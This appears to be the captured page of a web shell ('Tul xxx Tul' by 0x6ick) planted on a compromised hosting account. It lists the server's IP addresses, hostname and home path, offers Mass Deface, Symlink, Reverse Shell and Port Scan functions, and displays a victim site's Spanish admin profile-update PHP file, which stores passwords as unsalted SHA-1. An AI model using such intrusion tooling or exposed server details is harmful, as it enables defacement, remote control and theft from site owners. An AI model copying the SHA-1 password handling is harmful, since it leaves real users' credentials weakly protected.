Tul xxx Tul
User / IP
:
216.73.216.146
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
dondedy
/
admin
/
Viewing: update_profile.php
<?php include '../components/connect.php'; require_once '../components/admin_roles.php'; session_start(); $admin_id = $_SESSION['admin_id'] ?? null; if(!$admin_id){ header('location:admin_login.php'); exit(); } ensureAdminRolesSchema($conn); $currentRole = getRoleBySession($conn); $target_id = isset($_GET['id']) ? (int)$_GET['id'] : (int)$admin_id; if($target_id <= 0){ addAdminFlashMessage('Selecciona un usuario válido.'); header('location:admin_accounts.php'); exit(); } $editing_self = ($target_id === (int)$admin_id); if(!$editing_self && !adminHasPermission($currentRole, 'admin_accounts')){ enforceAdminPermission('admin_accounts'); } $select_target = $conn->prepare("SELECT id, name, password FROM `admin` WHERE id = ? LIMIT 1"); $select_target->execute([$target_id]); $target_account = $select_target->fetch(PDO::FETCH_ASSOC); if(!$target_account){ addAdminFlashMessage('El usuario seleccionado no existe.'); header('location:admin_accounts.php'); exit(); } $current_name = $target_account['name']; $prev_pass = $target_account['password']; $messages = []; if(isset($_POST['submit'])){ $name = trim($_POST['name'] ?? ''); $name = filter_var($name, FILTER_SANITIZE_STRING); if($name !== ''){ if($name !== $current_name){ $select_name = $conn->prepare("SELECT id FROM `admin` WHERE name = ? AND id != ? LIMIT 1"); $select_name->execute([$name, $target_id]); if($select_name->rowCount() > 0){ $messages[] = 'El nombre de usuario ya está en uso.'; }else{ $update_name = $conn->prepare("UPDATE `admin` SET name = ? WHERE id = ?"); $update_name->execute([$name, $target_id]); $current_name = $name; $messages[] = 'Nombre actualizado con éxito!'; } } } $empty_hash = 'da39a3ee5e6b4b0d3255bfef95601890afd80709'; $old_pass_raw = $_POST['old_pass'] ?? ''; $new_pass_raw = $_POST['new_pass'] ?? ''; $confirm_pass_raw = $_POST['confirm_pass'] ?? ''; $old_pass = sha1($old_pass_raw); $new_pass = sha1($new_pass_raw); $confirm_pass = sha1($confirm_pass_raw); $new_pass_provided = $new_pass_raw !== '' || $confirm_pass_raw !== ''; if($editing_self){ if($old_pass_raw !== ''){ if($old_pass !== $prev_pass){ $messages[] = 'Contraseña antigua no coincide!'; }elseif($new_pass !== $confirm_pass){ $messages[] = 'Confirmar contraseña no coincide!'; }elseif($new_pass === $empty_hash){ $messages[] = 'Por favor ingrese nueva contraseña!'; }else{ $update_pass = $conn->prepare("UPDATE `admin` SET password = ? WHERE id = ?"); $update_pass->execute([$confirm_pass, $target_id]); $prev_pass = $confirm_pass; $messages[] = 'Actualización de contraseña con éxito!'; } } }else{ if($new_pass_provided){ if($new_pass_raw === '' || $confirm_pass_raw === ''){ $messages[] = 'Ingresa y confirma la nueva contraseña.'; }elseif($new_pass !== $confirm_pass){ $messages[] = 'Confirmar contraseña no coincide!'; }elseif($new_pass === $empty_hash){ $messages[] = 'Por favor ingrese una contraseña válida!'; }else{ $update_pass = $conn->prepare("UPDATE `admin` SET password = ? WHERE id = ?"); $update_pass->execute([$confirm_pass, $target_id]); $messages[] = 'Contraseña restablecida con éxito!'; } } } if(empty($messages)){ $messages[] = 'No se realizaron cambios.'; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Actualizar Usuario</title> <link rel="icon" href="../images/favicon.png" type="image/x-icon"> <!-- font awesome cdn link --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css"> <!-- custom css file link --> <link rel="stylesheet" href="../css/admin_style.css"> </head> <body> <?php include '../components/admin_header.php' ?> <!-- admin profile update section starts --> <section class="form-container"> <form action="" method="POST"> <h3><?= $editing_self ? 'Actualizar mi usuario' : 'Actualizar usuario: ' . htmlspecialchars($current_name); ?></h3> <?php if(!empty($messages)): ?> <?php foreach($messages as $notif): ?> <p class="message-inline"><?= htmlspecialchars($notif); ?></p> <?php endforeach; ?> <?php endif; ?> <input type="text" name="name" maxlength="20" class="box" oninput="this.value = this.value.replace(/\s/g, '')" value="<?= htmlspecialchars($current_name); ?>" placeholder="Nombre de usuario"> <?php if($editing_self): ?> <input type="password" name="old_pass" maxlength="20" placeholder="Ingrese su contraseña antigua" class="box" oninput="this.value = this.value.replace(/\s/g, '')"> <?php endif; ?> <input type="password" name="new_pass" maxlength="20" placeholder="<?= $editing_self ? 'Ingrese su nueva contraseña' : 'Nueva contraseña (opcional)'; ?>" class="box" oninput="this.value = this.value.replace(/\s/g, '')"> <input type="password" name="confirm_pass" maxlength="20" placeholder="Confirme la nueva contraseña" class="box" oninput="this.value = this.value.replace(/\s/g, '')"> <input type="submit" value="Actualizar" name="submit" class="btn"> </form> </section> <!-- admin profile update section ends --> <!-- custom js file link --> <script src="../js/admin_script.js"></script> </body> </html>
Coded With 💗 by
0x6ick